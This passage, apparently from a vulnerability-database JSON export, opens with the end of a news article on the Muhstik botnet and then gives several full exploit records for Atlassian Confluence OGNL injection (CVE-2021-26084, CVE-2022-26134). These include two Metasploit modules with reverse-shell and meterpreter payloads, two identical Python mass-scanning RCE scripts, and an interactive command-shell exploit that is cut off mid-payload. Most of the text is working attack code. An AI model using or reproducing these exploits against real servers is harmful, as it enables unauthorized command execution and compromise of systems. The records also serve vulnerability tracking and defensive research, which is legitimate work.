botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2022-06-09T08:00:58", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:00:13", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-20T02:28:51", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new 